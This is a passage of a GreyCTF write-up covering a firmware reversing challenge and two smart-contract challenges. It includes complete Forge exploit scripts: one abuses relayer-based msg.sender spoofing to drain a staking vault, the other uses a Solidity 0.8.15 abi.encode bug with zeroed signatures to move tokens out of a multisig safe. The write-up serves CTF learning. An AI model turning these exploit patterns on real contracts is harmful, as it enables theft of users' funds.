15 if (PTR_BYTE_08003e08[iVar2] != (local_30[iVar2] ^ PTR_DAT_08003e04[iVar2]))
16 goto LAB_08003dac;
17 iVar2 = iVar2 + 1;
18 } while (iVar2 != 0x1e);
19 FUN_08004074(3,0);
20 FUN_08002700(DAT_08003e0c,1,0x4f42);
21 FUN_0800420a(0x80,DAT_08003e10);
22 cmplen(local_30,0x1e);
23 }
24 else {
25LAB_08003dac:
26 FUN_0800420a(0x80,PTR_s_WRONG!!!_08003e00);
27 }
28 return;
29}
So it XORs our 30 character long input against whatever is found at PTR_DAT_08003e04
and compares it to PTR_BYTE_08003e08
. Inspecting those two reveal that they’re pointers to values in… SRAM.
And since we’re doing static reversing, well…
Fig: SRAM being completely blank |
Yeah. I felt like reversing the binary to try and figure out when exactly these areas of memory get filled, but I just couldn’t. After the CTF, the challenge creator revealed that since the two regions of memory which are pointed to are just an offset from one another, I could’ve swept the binary with that offset to get the flag. However, during the CTF itself, I sought out an alternative solution…
Fig: The fucking nuclear option |
Just emulate the firmware???
Fig: Dumping the emulated SRAM |
We XOR these two bytestrings to get our flag, easy.
Flag: grey{what_flag_just_boot1_bro}
Blockchain
As previously stated, I wasn’t able to solve these challenges during the CTF itself due to a massive skill issue (an inability to implement the actual ideas). After the CTF, I managed to gitgud and upsolved these challenges and have thus included my solutions for posterity (and for my future reference too).
Metastaking
This is a challenge where we have a Staking contract tied to a Vault, where you can pass execution through the Staking contract via a Relayer, and your goal is to drain the vault.
As a RelayReceiver
, the Staking contract makes use of this _msgSender
function:
1 function _msgSender() internal view returns (address) {
2 if (msg.sender == relayer && msg.data.length >= 20) {
3 return address(bytes20(msg.data[msg.data.length - 20:]));
4 } else {
5 return msg.sender;
6 }
7 }
Take for example in the approve
function found in the Staking.sol
contract:
1 function approve(address spender, uint256 amount) external returns (bool) {
2 allowance[_msgSender()][spender] = amount;
3
4 emit Approval(_msgSender(), spender, amount);
5
6 return true;
7 }
So basically, if you run your transaction instructions through the Relayer, you can “spoof” the msg.sender
. And this is actually huge: looking at the approve
function, we can basically perform an arbitrary approval on any pair of addresses with this!
Thus, we shall make a relayed transaction which approves the spending/transfer of funds from the Setup contract (which is the one which deposits the tokens to steal in this challenge) to our own address, and then we just drain them afterwards.
To ensure that the msg.sender == relayer
is as expected, we also have to wrap our transaction data with the provided batchExecute
function:
1// SPDX-License-Identifier: UNLICENSED
2pragma solidity 0.8.15;
3
4abstract contract Batch {
5 function batchExecute(bytes[] calldata data) external returns (bytes[] memory results) {
6 results = new bytes[](data.length);
7 for (uint256 i = 0; i < data.length; i++) {
8 bool success;
9 (success, results[i]) = address(this).delegatecall(data[i]);
10 require(success, "Multicall failed");
11 }
12 return results;
13 }
14}
We fill out the logic for generating the transaction signature using Forge cheatcodes in our exploit script, which looks like this:
1// SPDX-License-Identifier: UNLICENSED
2pragma solidity 0.8.15;
3
4import "forge-std/Script.sol";
5import { Relayer } from "../src/Relayer.sol";
6import { Staking } from "../src/Staking.sol";
7import { Vault } from "../src/Vault.sol";
8import { GREY } from "../lib/GREY.sol";
9import { Batch } from "../lib/Batch.sol";
10
11contract Exploit is Script {
12
13 Relayer public relayer;
14 Staking public staking;
15 GREY public grey;
16
17 function run() external{
18
19 relayer = Relayer(0x7F65d50b2915D5B2Ca6cbb879cd5fe940FD44b86);
20 staking = Staking(0xbFbb2c333b6296687406ecDA918A4cd0740fAa12);
21 grey = GREY(0xA44B9f3F5Bb8C278c1ee85D8F32517c6EFa64B0D);
22
23 uint256 private_key = vm.envUint("PKEY");
24 address deployer = vm.addr(private_key);
25
26 vm.startBroadcast(private_key);
27
28 // now we construct the TX to be relayed
29 address spender = deployer;
30 uint256 amount = 10_000e18;
31
32 bytes memory data = abi.encodeCall(
33 Staking.approve,
34 (spender, amount)
35 );
36
37 bytes[] memory innerData = new bytes[](1);
38 innerData[0] = abi.encodePacked(data, address(0x700b6A60ce7EaaEA56F065753d8dcB9653dbAD35)); // append the address to serve as _msgSender
39
40
41 Relayer.Transaction memory transaction = Relayer.Transaction({
42 from: deployer,
43 to: address(staking),
44 value: 0,
45 gas: 100000,
46 data: abi.encodeCall(Batch.batchExecute, (innerData))
47 });
48
49 bytes32 transactionHash = keccak256(abi.encode(transaction, relayer.nonce()));
50 (uint8 v, bytes32 r, bytes32 s) = vm.sign(private_key, transactionHash);
51
52 assert(deployer == ecrecover(transactionHash, v, r, s));
53
54 Relayer.Signature memory signature = Relayer.Signature({
55 v: v,
56 r: r,
57 s: s,
58 deadline: block.timestamp + 3600 // 1 hour from now
59 });
60
61 Relayer.TransactionRequest memory request = Relayer.TransactionRequest({
62 transaction: transaction,
63 signature: signature
64 });
65
66 // Execute the transaction via the Relayer
67 relayer.execute(request);
68
69 vm.stopBroadcast();
70 }
71
72}
We manually make the fund transfers using cast send
afterwards and win :D
Gnosis Unsafe
This challenge involves the sort of spoofing of ecrecover
’s output. We basically want to fake being an Owner of the Safe contract in order to queue and execute a transaction.
Here’s where things get tricky.
Let’s look at the queueTransaction function:
1 function isOwner(address owner) public view returns (bool) {
2 for (uint256 i = 0; i < OWNER_COUNT; i++) {
3 if (owner == owners[i]) {
4 return true;
5 }
6 }
7 return false;
8 }
9
10 function queueTransaction(
11 uint8[OWNER_COUNT] calldata v,
12 bytes32[OWNER_COUNT] calldata r,
13 bytes32[OWNER_COUNT] calldata s,
14 Transaction calldata transaction
15 ) external returns (bytes32 queueHash) {
16 if (!isOwner(transaction.signer)) revert SignerIsNotOwner();
17
18 queueHash = keccak256(abi.encode(
19 transaction,
20 v,
21 r,
22 s
23 ));
24
25 queueHashToTimestamp[queueHash] = block.timestamp;
26 }
So for your transaction to be queued, you can set the transaction.signer
to one of the values set in the Owner array (which is initialized to [address(0x1337), address(0xdead), address(0xdeadbeef)]
). Solid, sure.
Now, for this transaction to actually be called, we have to call executeTransaction
:
1 function executeTransaction(
2 uint8[OWNER_COUNT] calldata v,
3 bytes32[OWNER_COUNT] calldata r,
4 bytes32[OWNER_COUNT] calldata s,
5 Transaction calldata transaction,
6 uint256 signatureIndex
7 ) external payable returns (bool success, bytes memory returndata) {
8 if (signatureIndex >= OWNER_COUNT) revert InvalidIndex();
9
10 bytes32 queueHash = keccak256(abi.encode(
11 transaction,
12 v,
13 r,
14 s
15 ));
16
17 uint256 queueTimestamp = queueHashToTimestamp[queueHash];
18 if (queueTimestamp == 0) revert TransactionNotQueued();
19 if (block.timestamp < queueTimestamp + VETO_DURATION) revert StillInVetoPeriod();
20
21 bytes32 txHash = keccak256(abi.encode(transaction));
22 if (transactionExecuted[txHash]) revert TransactionAlreadyExecuted();
23
24 address signer = ecrecover(
25 txHash,
26 v[signatureIndex],
27 r[signatureIndex],
28 s[signatureIndex]
29 );
30 if (signer != transaction.signer) revert InvalidSignature();
31
32 transactionExecuted[txHash] = true;
33 (success, returndata) = transaction.to.call{ value: transaction.value }(transaction.data);
34 }
Now we’re in trouble! We previously spoofed the transaction.signer
, and we require it to be the same to retrieve the transaction from the queue as it’s part of the data used to calculate the queue hash. However, at the end, we require the output of ecrecover
to match our transaction.signer
, and of course we don’t have the private keys to these vanity addresses!
But what if I told you you didn’t need the transaction.signer
to be the same?
The challenge is compiled with solidity version 0.8.15, and through some hardcore googling, we find this relevant bug which was previously used in a similar CTF challenge. Essentially, in our queueTransaction
function, after the call to isOwner
, we have a buggy call to abi.encode
which actually zeroes out our transaction.signer
.
This means we can subsequently make a call to executeTransaction
with a transaction.signer
set to address(0)
, and if we then pass in a bunch of invalid values for ecrecover
, it will pass the signer == transaction.signer
check!
So now we just create a Forge script which does just that, with our transaction data being a transfer of tokens from the safe to us.
1// SPDX-License-Identifier: UNLICENSED
2pragma solidity 0.8.15;
3
4import "forge-std/Script.sol";
5
6import { ISafe } from "../interfaces/ISafe.sol";
7import { Safe } from "../src/Safe.sol";
8import { GREY } from "../lib/GREY.sol";
9
10contract Exploit is Script {
11
12 Safe public safe;
13 GREY public grey;
14
15 function run() external {
16 uint256 private_key = vm.envUint("PKEY");
17 address deployer = vm.addr(private_key);
18
19 safe = Safe(payable(0xb406262CE03F4dD507Ca8B67649E7eE1a52Aa047));
20 grey = GREY(0xc19Bc969cfc40DfF49605AedefC69a74c5Aef69E);
21
22 vm.startBroadcast(private_key);
23
24 uint256 amount = 10_000e18;
25
26 bytes memory data = abi.encodeCall(
27 GREY.transferFrom,
28 (address(safe), deployer, amount)
29 );
30
31 ISafe.Transaction memory transaction = ISafe.Transaction({
32 signer: address(0x1337),
33 to: address(grey),
34 value: 0,
35 data: data
36 });
37
38 uint8[3] memory v = [0,0,0];
39 bytes32[3] memory r = [bytes32(0),bytes32(0),bytes32(0)];
40 bytes32[3] memory s = [bytes32(0),bytes32(0),bytes32(0)];
41
42 safe.queueTransaction(v, r, s, transaction);
43
44 assert(ecrecover(keccak256(abi.encode(
45 transaction,
46 v,
47 r,
48 s
49 )), v[0], r[0], s[0]) == address(0));
50
51 ISafe.Transaction memory transaction2 = ISafe.Transaction({
52 signer: address(0),
53 to: address(grey),
54 value: 0,
55 data: data
56 });
57
58 vm.sleep(65_000); // wait for veto period to end
59
60 safe.executeTransaction(v, r, s, transaction2, 0);
61
62 vm.stopBroadcast();
63 }
64
65}
And we win :")
Ending Remarks
This year’s iteration of GreyCTF was truly hella fun and I’ve walked away from it learning lots more. Huge props to the organising team and I’m definitely going to take part again next year.